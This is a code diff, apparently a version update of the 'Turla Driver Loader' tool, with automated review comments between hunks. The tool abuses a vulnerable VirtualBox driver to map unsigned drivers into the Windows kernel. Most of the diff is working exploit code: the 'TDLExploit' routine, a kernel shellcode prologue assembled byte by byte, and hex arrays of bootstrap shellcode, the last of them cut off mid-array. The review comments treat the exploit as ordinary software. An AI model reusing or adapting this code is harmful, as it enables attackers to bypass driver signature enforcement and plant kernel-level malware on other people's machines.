status = IoCreateDevice(DriverObject, 0, &DevName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, TRUE, &devobj); status = IoCreateDevice(DriverObject, 0, &DevName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, TRUE, &devobj);
#ifdef DEBUGPRINT #ifdef DEBUGPRINT
DbgPrint("%s IoCreateDevice(%wZ) = %lx", __FUNCTION__, DevName, status); DbgPrint("%s IoCreateDevice(%wZ) = %lx\n", __FUNCTION__, DevName, status);
#endif #endif
if (!NT_SUCCESS(status)) { if (!NT_SUCCESS(status)) {
return status; return status;
} }
RtlInitUnicodeString(&SymLink, szSymLink); RtlInitUnicodeString(&SymLink, L"\\DosDevices\\TDLD");
status = IoCreateSymbolicLink(&SymLink, &DevName); status = IoCreateSymbolicLink(&SymLink, &DevName);
#ifdef DEBUGPRINT #ifdef DEBUGPRINT
DbgPrint("%s IoCreateSymbolicLink(%wZ) = %lx", __FUNCTION__, SymLink, status); DbgPrint("%s IoCreateSymbolicLink(%wZ) = %lx\n", __FUNCTION__, SymLink, status);
#endif #endif
devobj->Flags |= DO_BUFFERED_IO; devobj->Flags |= DO_BUFFERED_IO;
@ -246,17 +269,6 @@ NTSTATUS DriverInitialize(
DriverObject->DriverUnload = NULL; //nonstandard way of driver loading, no unload DriverObject->DriverUnload = NULL; //nonstandard way of driver loading, no unload
devobj->Flags &= ~DO_DEVICE_INITIALIZING; devobj->Flags &= ~DO_DEVICE_INITIALIZING;
/*
RtlInitUnicodeString(&DrvRefName, szNullDrv);
if (NT_SUCCESS(ObReferenceObjectByName(&DrvRefName, OBJ_CASE_INSENSITIVE, NULL, 0,
*IoDriverObjectType, KernelMode, NULL, &driverObject)))
{
DbgPrint("drvObj %p", driverObject);
ListModules(driverObject);
ObDereferenceObject(driverObject);
}
*/
return status; return status;
} }
@ -275,21 +287,22 @@ NTSTATUS DriverEntry(
{ {
NTSTATUS status; NTSTATUS status;
UNICODE_STRING drvName; UNICODE_STRING drvName;
WCHAR szDrvName[] = { L'\\', L'D', L'r', L'i', L'v', L'e', L'r', L'\\', L'T', L'D', L'L', L'D', 0 };
/* This parameters are invalid due to nonstandard way of loading and should not be used. */ /* This parameters are invalid due to nonstandard way of loading and should not be used. */
UNREFERENCED_PARAMETER(DriverObject); UNREFERENCED_PARAMETER(DriverObject);
UNREFERENCED_PARAMETER(RegistryPath); UNREFERENCED_PARAMETER(RegistryPath);
PrintIrql();
#ifdef DEBUGPRINT #ifdef DEBUGPRINT
DbgPrint("%s", __FUNCTION__); DbgPrint("%s\n", __FUNCTION__);
#endif #endif
RtlInitUnicodeString(&drvName, szDrvName); RtlInitUnicodeString(&drvName, L"\\Driver\\TDLD");
status = IoCreateDriver(&drvName, &DriverInitialize); status = IoCreateDriver(&drvName, &DriverInitialize);
#ifdef DEBUGPRINT #ifdef DEBUGPRINT
DbgPrint("%s IoCreateDriver(%wZ) = %lx", __FUNCTION__, drvName, status); DbgPrint("%s IoCreateDriver(%wZ) = %lx\n", __FUNCTION__, drvName, status);
#endif #endif
return status; return status;
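Review bot: `VOID PrintIrql()` is declared with an empty parameter list, which in C is an unspecified-arguments declaration rather than a zero-argument one; the kernel headers use the explicit form, so `VOID PrintIrql(VOID)` is the signature to use, and `static` would fit since nothing outside this file needs it. In the DriverEntry hunk at the end of the section the call `PrintIrql();` sits before the `#ifdef DEBUGPRINT` block, so its output is emitted even when that define is off — presumably intended given the purpose comment, but if not, `#ifdef DEBUGPRINT` around the call matches the rest of the function. DriverEntry's closing brace is outside the hunk.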


@ -1,12 +1,12 @@
/******************************************************************************* /*******************************************************************************
* *
* (C) COPYRIGHT AUTHORS, 2016 * (C) COPYRIGHT AUTHORS, 2016 - 2017
* *
* TITLE: MAIN.H * TITLE: MAIN.H
* *
* VERSION: 1.00 * VERSION: 1.01
* *
* DATE: 29 Jan 2016 * DATE: 20 Apr 2017
* *
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -24,21 +24,6 @@ IoCreateDriver(
IN PDRIVER_INITIALIZE InitializationFunction IN PDRIVER_INITIALIZE InitializationFunction
); );
NTKERNELAPI
NTSTATUS
ObReferenceObjectByName(
__in PUNICODE_STRING ObjectName,
__in ULONG Attributes,
__in_opt PACCESS_STATE AccessState,
__in_opt ACCESS_MASK DesiredAccess,
__in POBJECT_TYPE ObjectType,
__in KPROCESSOR_MODE AccessMode,
__inout_opt PVOID ParseContext,
__out PVOID *Object
);
extern POBJECT_TYPE *IoDriverObjectType;
_Dispatch_type_(IRP_MJ_DEVICE_CONTROL) _Dispatch_type_(IRP_MJ_DEVICE_CONTROL)
DRIVER_DISPATCH DevioctlDispatch; DRIVER_DISPATCH DevioctlDispatch;
_Dispatch_type_(IRP_MJ_CREATE) _Dispatch_type_(IRP_MJ_CREATE)
@ -88,25 +73,3 @@ typedef struct _INOUT_PARAM {
ULONG Param3; ULONG Param3;
ULONG Param4; ULONG Param4;
} INOUT_PARAM, *PINOUTPARAM; } INOUT_PARAM, *PINOUTPARAM;
typedef struct _KLDR_DATA_TABLE_ENTRY {
LIST_ENTRY InLoadOrderLinks;
PVOID ExceptionTable;
ULONG ExceptionTableSize;
// ULONG padding on IA64
PVOID GpValue;
PVOID NonPagedDebugInfo;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
ULONG Flags;
USHORT LoadCount;
USHORT __Unused5;
PVOID SectionPointer;
ULONG CheckSum;
// ULONG padding on IA64
PVOID LoadedImports;
PVOID PatchInformation;
} KLDR_DATA_TABLE_ENTRY, *PKLDR_DATA_TABLE_ENTRY;


@ -53,7 +53,7 @@
<LinkIncremental>false</LinkIncremental> <LinkIncremental>false</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir> <OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir> <IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<CodeAnalysisRuleSet>NativeRecommendedRules.ruleset</CodeAnalysisRuleSet> <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<RunCodeAnalysis>false</RunCodeAnalysis> <RunCodeAnalysis>false</RunCodeAnalysis>
</PropertyGroup> </PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
@ -78,23 +78,23 @@
<WarningLevel>Level4</WarningLevel> <WarningLevel>Level4</WarningLevel>
<PrecompiledHeader> <PrecompiledHeader>
</PrecompiledHeader> </PrecompiledHeader>
<Optimization>MaxSpeed</Optimization> <Optimization>Full</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking> <FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions> <IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<CompileAs>CompileAsC</CompileAs> <CompileAs>CompileAsC</CompileAs>
<MultiProcessorCompilation>true</MultiProcessorCompilation> <MultiProcessorCompilation>true</MultiProcessorCompilation>
<StringPooling>true</StringPooling> <StringPooling>true</StringPooling>
<EnablePREfast>false</EnablePREfast> <EnablePREfast>false</EnablePREfast>
<ControlFlowGuard>Guard</ControlFlowGuard> <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary> <FavorSizeOrSpeed>Neither</FavorSizeOrSpeed>
<SDLCheck>true</SDLCheck>
</ClCompile> </ClCompile>
<Link> <Link>
<SubSystem>Console</SubSystem> <SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding> <EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences> <OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation> <GenerateDebugInformation>false</GenerateDebugInformation>
<EntryPointSymbol>TDLMain</EntryPointSymbol> <EntryPointSymbol>TDLMain</EntryPointSymbol>
<SetChecksum>true</SetChecksum> <SetChecksum>true</SetChecksum>
<UACExecutionLevel>RequireAdministrator</UACExecutionLevel> <UACExecutionLevel>RequireAdministrator</UACExecutionLevel>
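Review bot: The `<ClCompile>` block carrying `NDEBUG;_CONSOLE` (presumably the Release|x64 configuration) drops `<ControlFlowGuard>Guard</ControlFlowGuard>` on the new side, and nothing in the hunk says why; the line disappears in the same spot where `<RuntimeLibrary>` changes to MultiThreadedDLL, so the hardening regression is easy to overlook among optimization tweaks. If disabling Control Flow Guard is deliberate, a one-line MSBuild comment beside `<RuntimeLibrary>` such as `<!-- CFG intentionally disabled: <reason> -->` would record that; otherwise `<ControlFlowGuard>Guard</ControlFlowGuard>` should be restored. Separately, `<RunCodeAnalysis>` remains `false` on both sides, so the `<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>` change in the first hunk has no effect on a normal build.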

@ -4,9 +4,9 @@
* *
* TITLE: GLOBAL.H * TITLE: GLOBAL.H
* *
* VERSION: 1.10 * VERSION: 1.11
* *
* DATE: 17 Apr 2017 * DATE: 20 Apr 2017
* *
* Common header file for the program support routines. * Common header file for the program support routines.
* *

@ -4,9 +4,9 @@
* *
* TITLE: MAIN.C * TITLE: MAIN.C
* *
* VERSION: 1.10 * VERSION: 1.11
* *
* DATE: 17 Apr 2017 * DATE: 20 Apr 2017
* *
* Furutaka entry point. * Furutaka entry point.
* *
@ -34,17 +34,18 @@ BOOL g_ConsoleOutput = FALSE;
BOOL g_VBoxInstalled = FALSE; BOOL g_VBoxInstalled = FALSE;
WCHAR g_BE = 0xFEFF; WCHAR g_BE = 0xFEFF;
ULONG g_NtBuildNumber = 0;
#define VBoxDrvSvc TEXT("VBoxDrv") #define VBoxDrvSvc TEXT("VBoxDrv")
#define supImageName "furutaka" #define supImageName "furutaka"
#define supImageHandle 0x1a000 #define supImageHandle 0x1a000
#define PAGE_SIZE 0x1000 #define PAGE_SIZE 0x1000
#define scDataOffset 0x214 //shellcode data offset
#define T_LOADERTITLE TEXT("Turla Driver Loader v1.1 (17/04/17)") #define T_LOADERTITLE TEXT("Turla Driver Loader v1.1.1 (20/04/17)")
#define T_LOADERUNSUP TEXT("Unsupported WinNT version\r\n") #define T_LOADERUNSUP TEXT("Unsupported WinNT version\r\n")
#define T_LOADERRUN TEXT("Another instance running, close it before\r\n") #define T_LOADERRUN TEXT("Another instance running, close it before\r\n")
#define T_LOADERUSAGE TEXT("Usage: loader drivertoload\n\re.g. loader mydrv.sys\r\n") #define T_LOADERUSAGE TEXT("Usage: loader drivertoload\n\re.g. loader mydrv.sys\r\n")
#define T_LOADERINTRO TEXT("Turla Driver Loader v1.1.0 started\r\n(c) 2016 - 2017 TDL Project\r\nSupported x64 OS : 7 and above\r\n") #define T_LOADERINTRO TEXT("Turla Driver Loader v1.1.1 started\r\n(c) 2016 - 2017 TDL Project\r\nSupported x64 OS : 7 and above\r\n")
/* /*
* TDLVBoxInstalled * TDLVBoxInstalled
@ -83,8 +84,8 @@ BOOL TDLVBoxInstalled(
* *
*/ */
void TDLRelocImage( void TDLRelocImage(
ULONG_PTR Image, _In_ ULONG_PTR Image,
ULONG_PTR NewImageBase _In_ ULONG_PTR NewImageBase
) )
{ {
PIMAGE_OPTIONAL_HEADER popth; PIMAGE_OPTIONAL_HEADER popth;
@ -139,9 +140,9 @@ void TDLRelocImage(
* *
*/ */
ULONG_PTR TDLGetProcAddress( ULONG_PTR TDLGetProcAddress(
ULONG_PTR KernelBase, _In_ ULONG_PTR KernelBase,
ULONG_PTR KernelImage, _In_ ULONG_PTR KernelImage,
LPCSTR FunctionName _In_ LPCSTR FunctionName
) )
{ {
ANSI_STRING cStr; ANSI_STRING cStr;
@ -163,9 +164,9 @@ ULONG_PTR TDLGetProcAddress(
* *
*/ */
void TDLResolveKernelImport( void TDLResolveKernelImport(
ULONG_PTR Image, _In_ ULONG_PTR Image,
ULONG_PTR KernelImage, _In_ ULONG_PTR KernelImage,
ULONG_PTR KernelBase _In_ ULONG_PTR KernelBase
) )
{ {
PIMAGE_OPTIONAL_HEADER popth; PIMAGE_OPTIONAL_HEADER popth;
@ -211,8 +212,9 @@ void TDLResolveKernelImport(
* *
*/ */
void TDLExploit( void TDLExploit(
LPVOID Shellcode, _In_ LPVOID Shellcode,
ULONG CodeSize _In_ ULONG CodeSize,
_In_ ULONG DataOffset
) )
{ {
SUPCOOKIE Cookie; SUPCOOKIE Cookie;
@ -307,7 +309,7 @@ void TDLExploit(
ultohex(CodeSize, _strend(text)); ultohex(CodeSize, _strend(text));
_strcat(text, TEXT("\r\n\tDriver image mapped at 0x")); _strcat(text, TEXT("\r\n\tDriver image mapped at 0x"));
u64tohex((ULONG_PTR)ImageBase + scDataOffset, _strend(text)); u64tohex((ULONG_PTR)ImageBase + DataOffset, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
} }
@ -376,13 +378,14 @@ void TDLExploit(
* *
*/ */
UINT TDLMapDriver( UINT TDLMapDriver(
LPWSTR lpDriverFullName _In_ LPWSTR lpDriverFullName
) )
{ {
UINT result = (UINT)-1; UINT result = (UINT)-1;
ULONG isz; ULONG isz, prologueSize, dataOffset;
SIZE_T memIO; SIZE_T memIO;
ULONG_PTR KernelBase, KernelImage = 0, xExAllocatePoolWithTag = 0, xPsCreateSystemThread = 0; ULONG_PTR KernelBase, KernelImage = 0;
ULONG_PTR xExAllocatePoolWithTag = 0, xPsCreateSystemThread = 0, xZwClose = 0;
HMODULE Image = NULL; HMODULE Image = NULL;
PIMAGE_NT_HEADERS FileHeader; PIMAGE_NT_HEADERS FileHeader;
PBYTE Buffer = NULL; PBYTE Buffer = NULL;
@ -443,6 +446,7 @@ UINT TDLMapDriver(
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
} }
if (g_NtBuildNumber < 15063) {
RtlInitString(&routineName, "PsCreateSystemThread"); RtlInitString(&routineName, "PsCreateSystemThread");
status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xPsCreateSystemThread); status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xPsCreateSystemThread);
if ((!NT_SUCCESS(status)) || (xPsCreateSystemThread == 0)) { if ((!NT_SUCCESS(status)) || (xPsCreateSystemThread == 0)) {
@ -455,6 +459,19 @@ UINT TDLMapDriver(
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
} }
RtlInitString(&routineName, "ZwClose");
status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xZwClose);
if ((!NT_SUCCESS(status)) || (xZwClose == 0)) {
cuiPrintText(g_ConOut, TEXT("Ldr: Error, ZwClose address not found"), g_ConsoleOutput, TRUE);
break;
}
else {
_strcpy(text, TEXT("Ldr: ZwClose 0x"));
u64tohex(KernelBase + (xZwClose - KernelImage), _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
}
}
memIO = isz + PAGE_SIZE; memIO = isz + PAGE_SIZE;
NtAllocateVirtualMemory(NtCurrentProcess(), (PVOID)&Buffer, 0, &memIO, NtAllocateVirtualMemory(NtCurrentProcess(), (PVOID)&Buffer, 0, &memIO,
MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
@ -470,25 +487,49 @@ UINT TDLMapDriver(
// mov rcx, ExAllocatePoolWithTag // mov rcx, ExAllocatePoolWithTag
// mov rdx, PsCreateSystemThread // mov rdx, PsCreateSystemThread
// mov r8, ZwClose
Buffer[0x00] = 0x48; // mov rcx, xxxxx Buffer[0x00] = 0x48; // mov rcx, xxxxx
Buffer[0x01] = 0xb9; Buffer[0x01] = 0xb9;
*((PULONG_PTR)&Buffer[2]) = *((PULONG_PTR)&Buffer[2]) =
KernelBase + (xExAllocatePoolWithTag - KernelImage); KernelBase + (xExAllocatePoolWithTag - KernelImage);
if (g_NtBuildNumber < 15063) {
Buffer[0x0a] = 0x48; // mov rdx, xxxxx Buffer[0x0a] = 0x48; // mov rdx, xxxxx
Buffer[0x0b] = 0xba; Buffer[0x0b] = 0xba;
*((PULONG_PTR)&Buffer[0x0c]) = *((PULONG_PTR)&Buffer[0x0c]) =
KernelBase + (xPsCreateSystemThread - KernelImage); KernelBase + (xPsCreateSystemThread - KernelImage);
Buffer[0x14] = 0x49; //mov r8, xxxxx
Buffer[0x15] = 0xb8;
*((PULONG_PTR)&Buffer[0x16]) =
KernelBase + (xZwClose - KernelImage);
RtlCopyMemory(Buffer + 0x14, prologueSize = 0x1e;
}
else {
prologueSize = 0x0a;
}
dataOffset = prologueSize + MAX_SHELLCODE_LENGTH;
if (g_NtBuildNumber < 15063) {
RtlCopyMemory(Buffer + prologueSize,
TDLBootstrapLoader_code, sizeof(TDLBootstrapLoader_code)); TDLBootstrapLoader_code, sizeof(TDLBootstrapLoader_code));
RtlCopyMemory(Buffer + scDataOffset, Image, isz); cuiPrintText(g_ConOut, TEXT("Ldr: Default bootstrap shellcode selected"), g_ConsoleOutput, TRUE);
}
else {
RtlCopyMemory(Buffer + prologueSize,
TDLBootstrapLoader_code_w10rs2, sizeof(TDLBootstrapLoader_code_w10rs2));
cuiPrintText(g_ConOut, TEXT("Ldr: Windows 10 RS2+ bootstrap shellcode selected"), g_ConsoleOutput, TRUE);
}
RtlCopyMemory(Buffer + dataOffset, Image, isz);
cuiPrintText(g_ConOut, TEXT("Ldr: Resolving kernel import"), g_ConsoleOutput, TRUE); cuiPrintText(g_ConOut, TEXT("Ldr: Resolving kernel import"), g_ConsoleOutput, TRUE);
TDLResolveKernelImport((ULONG_PTR)Buffer + scDataOffset, KernelImage, KernelBase); TDLResolveKernelImport((ULONG_PTR)Buffer + dataOffset, KernelImage, KernelBase);
cuiPrintText(g_ConOut, TEXT("Ldr: Executing exploit"), g_ConsoleOutput, TRUE); cuiPrintText(g_ConOut, TEXT("Ldr: Executing exploit"), g_ConsoleOutput, TRUE);
TDLExploit(Buffer, isz + PAGE_SIZE); TDLExploit(Buffer, isz + PAGE_SIZE, dataOffset);
result = 0; result = 0;
break; break;
} }
@ -575,14 +616,15 @@ HANDLE TDLStartVulnerableDriver(
} }
} }
//if vbox installed backup it driver, do it before dropping our //
// If vbox installed backup it driver, do it before dropping our
// Ignore error if file not found
//
if (g_VBoxInstalled) { if (g_VBoxInstalled) {
if (supBackupVBoxDrv(FALSE) == FALSE) { if (supBackupVBoxDrv(FALSE) == FALSE) {
cuiPrintText(g_ConOut, cuiPrintText(g_ConOut,
TEXT("Ldr: Error while doing VirtualBox driver backup"), TEXT("Ldr: Error while doing VirtualBox driver backup"),
g_ConsoleOutput, TRUE); g_ConsoleOutput, TRUE);
break;
} }
} }
@ -717,7 +759,7 @@ void TDLStopVulnerableDriver(
* *
*/ */
UINT TDLProcessCommandLine( UINT TDLProcessCommandLine(
LPWSTR lpCommandLine _In_ LPWSTR lpCommandLine
) )
{ {
UINT retVal = (UINT)-1; UINT retVal = (UINT)-1;
@ -765,7 +807,7 @@ void TDLMain()
UINT uResult = 0; UINT uResult = 0;
DWORD dwTemp; DWORD dwTemp;
LONG x; LONG x;
OSVERSIONINFOW osv; OSVERSIONINFO osv;
WCHAR text[256]; WCHAR text[256];
__security_init_cookie(); __security_init_cookie();
@ -795,7 +837,6 @@ void TDLMain()
T_LOADERINTRO, T_LOADERINTRO,
g_ConsoleOutput, TRUE); g_ConsoleOutput, TRUE);
x = InterlockedIncrement((PLONG)&g_lApplicationInstances); x = InterlockedIncrement((PLONG)&g_lApplicationInstances);
if (x > 1) { if (x > 1) {
cuiPrintText(g_ConOut, cuiPrintText(g_ConOut,
@ -817,6 +858,8 @@ void TDLMain()
break; break;
} }
g_NtBuildNumber = osv.dwBuildNumber;
_strcpy(text, TEXT("Ldr: Windows v")); _strcpy(text, TEXT("Ldr: Windows v"));
ultostr(osv.dwMajorVersion, _strend(text)); ultostr(osv.dwMajorVersion, _strend(text));
_strcat(text, TEXT(".")); _strcat(text, TEXT("."));
@ -825,6 +868,10 @@ void TDLMain()
ultostr(osv.dwBuildNumber, _strend(text)); ultostr(osv.dwBuildNumber, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
//
// If VirtualBox installed on the same machine warn user,
// however this is unnecessary can lead to any conflicts.
//
g_VBoxInstalled = TDLVBoxInstalled(); g_VBoxInstalled = TDLVBoxInstalled();
if (g_VBoxInstalled) { if (g_VBoxInstalled) {
cuiPrintText(g_ConOut, cuiPrintText(g_ConOut,
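Review bot: The build-number gate `g_NtBuildNumber < 15063` is written out three times in TDLMapDriver (before `RtlInitString(&routineName, "PsCreateSystemThread")`, before `Buffer[0x0a] = 0x48`, and again directly after the `prologueSize` assignment), and the last two are back-to-back conditionals on the same value that could be a single block. A named constant keeps the three sites from drifting and states the intent, e.g. `#define NT_BUILD_W10RS2 15063` alongside the other defines and `if (g_NtBuildNumber < NT_BUILD_W10RS2)` at each site. The new comment in TDLMain, `however this is unnecessary can lead to any conflicts`, reads as garbled; if the intent is that a co-installed VirtualBox is merely a conflict risk, `// however this is not required, it can only lead to conflicts` would be clearer. TDLMapDriver's body continues outside the hunks shown.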

@ -4,9 +4,9 @@
* *
* TITLE: SHELLCODE.H * TITLE: SHELLCODE.H
* *
* VERSION: 1.10 * VERSION: 1.11
* *
* DATE: 17 Apr 2017 * DATE: 20 Apr 2017
* *
* Loader bootstrap shellcode. * Loader bootstrap shellcode.
* *
@ -22,8 +22,7 @@
typedef PVOID(NTAPI *PfnExAllocatePoolWithTag)( typedef PVOID(NTAPI *PfnExAllocatePoolWithTag)(
_In_ POOL_TYPE PoolType, _In_ POOL_TYPE PoolType,
_In_ SIZE_T NumberOfBytes, _In_ SIZE_T NumberOfBytes,
_In_ ULONG Tag _In_ ULONG Tag);
);
typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)( typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)(
_Out_ PHANDLE ThreadHandle, _Out_ PHANDLE ThreadHandle,
@ -32,8 +31,14 @@ typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)(
_In_opt_ HANDLE ProcessHandle, _In_opt_ HANDLE ProcessHandle,
_Out_opt_ PCLIENT_ID ClientId, _Out_opt_ PCLIENT_ID ClientId,
_In_ PKSTART_ROUTINE StartRoutine, _In_ PKSTART_ROUTINE StartRoutine,
_In_opt_ PVOID StartContext _In_opt_ PVOID StartContext);
);
typedef NTSTATUS (NTAPI *PfnZwClose)(
_In_ HANDLE Handle);
typedef NTSTATUS(NTAPI *PfnDriverEntry)();
#define MAX_SHELLCODE_LENGTH 0x300
/* /*
* TDLBootstrapLoader * TDLBootstrapLoader
@ -46,10 +51,11 @@ typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)(
/* /*
void TDLBootstrapLoader( void TDLBootstrapLoader(
PfnExAllocatePoolWithTag ExAllocatePoolWithTag, PfnExAllocatePoolWithTag ExAllocatePoolWithTag,
PfnPsCreateSystemThread PsCreateSystemThread) PfnPsCreateSystemThread PsCreateSystemThread,
PfnZwClose ZwClose)
{ {
ULONG_PTR pos, exbuffer, ULONG_PTR pos, exbuffer,
Image = ((ULONG_PTR)&TDLBootstrapLoader) + 0x200; Image = ((ULONG_PTR)&TDLBootstrapLoader) + MAX_SHELLCODE_LENGTH;
PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Image; PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Image;
PIMAGE_FILE_HEADER fileh = PIMAGE_FILE_HEADER fileh =
@ -110,36 +116,148 @@ void TDLBootstrapLoader(
for (pos = 0; pos < isz; pos++) for (pos = 0; pos < isz; pos++)
((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos]; ((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos];
th = NULL;
InitializeObjectAttributes(&attr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL); InitializeObjectAttributes(&attr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
PsCreateSystemThread(&th, THREAD_ALL_ACCESS, &attr, NULL, NULL, if (NT_SUCCESS(PsCreateSystemThread(&th, THREAD_ALL_ACCESS, &attr, NULL, NULL,
(PKSTART_ROUTINE)(exbuffer + popth->AddressOfEntryPoint), NULL); (PKSTART_ROUTINE)(exbuffer + popth->AddressOfEntryPoint), NULL)))
{
ZwClose(th);
}
} }
*/ */
static const unsigned char TDLBootstrapLoader_code[415] = { const unsigned char TDLBootstrapLoader_code[480] = {
0x40, 0x53, 0x56, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x48, 0x83, 0xEC, 0x70, 0x4C, 0x8B, 0xE2, 0x48, 0x8B, 0xC4, 0x41, 0x54, 0x48, 0x81, 0xEC, 0x90, 0x00, 0x00, 0x00, 0x48, 0x89, 0x58, 0x10,
0x4C, 0x89, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xC9, 0x48, 0x8D, 0x1D, 0xDE, 0xFF, 0x4D, 0x8B, 0xE0, 0x48, 0x89, 0x68, 0x18, 0x48, 0x8D, 0x1D, 0xE2, 0xFF, 0xFF, 0xFF, 0x4C, 0x89,
0xFF, 0xFF, 0x48, 0x81, 0xC3, 0x00, 0x02, 0x00, 0x00, 0x33, 0xC9, 0x41, 0xB8, 0x54, 0x64, 0x6C, 0x68, 0xE8, 0x48, 0x81, 0xC3, 0x00, 0x03, 0x00, 0x00, 0x4C, 0x89, 0x70, 0xE0, 0x4C, 0x8B, 0xEA,
0x53, 0x4C, 0x63, 0x73, 0x3C, 0x4C, 0x03, 0xF3, 0x45, 0x8B, 0x7E, 0x50, 0x41, 0x8D, 0x97, 0x00, 0x4C, 0x89, 0x78, 0xD8, 0x4C, 0x8B, 0xC9, 0x33, 0xC9, 0x41, 0xB8, 0x54, 0x64, 0x6C, 0x53, 0x4C,
0x10, 0x00, 0x00, 0x41, 0xFF, 0xD1, 0x45, 0x33, 0xED, 0x48, 0x8D, 0xB0, 0x00, 0x10, 0x00, 0x00, 0x63, 0x73, 0x3C, 0x4C, 0x03, 0xF3, 0x45, 0x8B, 0x7E, 0x50, 0x41, 0x8D, 0x97, 0x00, 0x10, 0x00,
0x48, 0x81, 0xE6, 0x00, 0xF0, 0xFF, 0xFF, 0x41, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x05, 0x0F, 0x00, 0x41, 0xFF, 0xD1, 0x45, 0x33, 0xC9, 0x48, 0x8D, 0xA8, 0x00, 0x10, 0x00, 0x00, 0x48, 0x81,
0x86, 0xAB, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x8E, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84, 0xE5, 0x00, 0xF0, 0xFF, 0xFF, 0x41, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x05, 0x0F, 0x86, 0xB0,
0x9C, 0x00, 0x00, 0x00, 0x48, 0x89, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x04, 0x0B, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x8E, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84, 0xA1, 0x00,
0x41, 0x8B, 0xAE, 0xB4, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xDE, 0x4D, 0x2B, 0x5E, 0x30, 0x48, 0x89, 0x00, 0x00, 0x48, 0x89, 0xB4, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x04, 0x0B, 0x41, 0x8B,
0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xFD, 0x85, 0xED, 0x74, 0x63, 0x0F, 0x1F, 0x00, 0xB6, 0xB4, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xDD, 0x4D, 0x2B, 0x5E, 0x30, 0x48, 0x89, 0xBC, 0x24,
0x88, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xF9, 0x85, 0xF6, 0x74, 0x68, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43, 0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43,
